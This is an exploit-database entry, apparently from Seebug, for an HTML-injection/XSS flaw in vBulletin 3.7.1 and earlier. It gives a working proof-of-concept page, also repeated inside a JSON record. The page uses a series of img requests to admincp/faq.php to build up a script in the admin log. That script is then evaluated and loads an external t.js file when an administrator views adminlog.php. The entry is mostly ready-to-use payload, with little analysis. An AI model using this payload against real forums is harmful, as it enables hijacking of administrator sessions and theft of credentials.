Search...

VBulletin <= 3.7.1 - admincp/faq.php Injection adminlog.php XSS

2014-07-01T00:00:00

ID SSV:85324
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/30134/info

vBulletin is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

Versions prior to vBulletin 3.7.2 PL1 and 3.6.10 PL3 are vulnerable. 

&#60;html&#62;
&#60;body&#62;
&#60;img 
src=&#34;http://http://www.example.com/vB/upload/admincp/faq.php/0?do=&#60;script&#62;/*&#34; 
/&#62;
&#60;img
src=&#34;http://http://www.example.com/vB/upload/admincp/faq.php/1?do=*/a%3D&#039;document.wri&#039;/*&#34;
/&#62;
&#60;img
src=&#34;http://http://www.example.com/vB/upload/admincp/faq.php/2?do=*/b%3D&#039;te(%22&#60;script
&#039;/*&#34; /&#62;
&#60;img
src=&#34;http://http://www.example.com/vB/upload/admincp/faq.php/3?do=*/c%3D&#039;src=http://&#039;/*&#34;
/&#62;
&#60;!--edit to match your data --&#62;
&#60;img
src=&#34;http://http://www.example.com/vB/upload/admincp/faq.php/4?do=*/d%3D&#039;http://www.example.com/&#039;/*&#34;
/&#62;
&#60;img 
src=&#34;http://http://www.example.com/vB/upload/admincp/faq.php/5?do=*/e%3D&#039;&#039;/*&#34; 
/&#62;
&#60;img
src=&#34;http://http://www.example.com/vB/upload/admincp/faq.php/6?do=*/f%3D&#039;t.js&#62;&#60;/scrip&#039;/*&#34;
/&#62;
&#60;!-- end edit --&#62;
&#60;img
src=&#34;http://http://www.example.com/vB/upload/admincp/faq.php/7?do=*/g%3D&#039;t&#62;%22)&#039;/*&#34; 
/&#62;
&#60;img
src=&#34;http://http://www.example.com/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/*&#34;
/&#62;
&#60;img 
src=&#34;http://http://www.example.com/vB/upload/admincp/faq.php/9?do=*/eval(h)/*&#34; 
/&#62;
&#60;img 
src=&#34;http://http://www.example.com/vB/upload/admincp/faq.php/a0?do=*/&#60;/script&#62;&#34; 
/&#62;
&#60;/body&#62;
&#60;/html&#62;

JSON Vulners Source

Initial Source

{"lastseen": "2017-11-19T15:45:42", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2017-11-19T15:45:42", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T15:45:42", "rev": 2}, "vulnersScore": 0.0}, "href": "https://www.seebug.org/vuldb/ssvid-85324", "references": [], "enchantments_done": [], "id": "SSV:85324", "title": "VBulletin <= 3.7.1 - admincp/faq.php Injection adminlog.php XSS", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 1, "sourceData": "\n source: http://www.securityfocus.com/bid/30134/info\r\n\r\nvBulletin is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.\r\n\r\nAttacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.\r\n\r\nVersions prior to vBulletin 3.7.2 PL1 and 3.6.10 PL3 are vulnerable. \r\n\r\n<html>\r\n<body>\r\n<img \r\nsrc="http://http://www.example.com/vB/upload/admincp/faq.php/0?do=<script>/*" \r\n/>\r\n<img\r\nsrc="http://http://www.example.com/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri'/*"\r\n/>\r\n<img\r\nsrc="http://http://www.example.com/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22<script\r\n'/*" />\r\n<img\r\nsrc="http://http://www.example.com/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'/*"\r\n/>\r\n\r\n<img\r\nsrc="http://http://www.example.com/vB/upload/admincp/faq.php/4?do=*/d%3D'http://www.example.com/'/*"\r\n/>\r\n<img \r\nsrc="http://http://www.example.com/vB/upload/admincp/faq.php/5?do=*/e%3D''/*" \r\n/>\r\n<img\r\nsrc="http://http://www.example.com/vB/upload/admincp/faq.php/6?do=*/f%3D't.js></scrip'/*"\r\n/>\r\n\r\n<img\r\nsrc="http://http://www.example.com/vB/upload/admincp/faq.php/7?do=*/g%3D't>%22)'/*" \r\n/>\r\n<img\r\nsrc="http://http://www.example.com/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/*"\r\n/>\r\n<img \r\nsrc="http://http://www.example.com/vB/upload/admincp/faq.php/9?do=*/eval(h)/*" \r\n/>\r\n<img \r\nsrc="http://http://www.example.com/vB/upload/admincp/faq.php/a0?do=*/</script>" \r\n/>\r\n</body>\r\n</html>\r\n\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-85324", "type": "seebug", "immutableFields": []}

VBulletin &lt;= 3.7.1 - admincp/faq.php Injection adminlog.php XSS

Description

No description provided by source.

VBulletin <= 3.7.1 - admincp/faq.php Injection adminlog.php XSS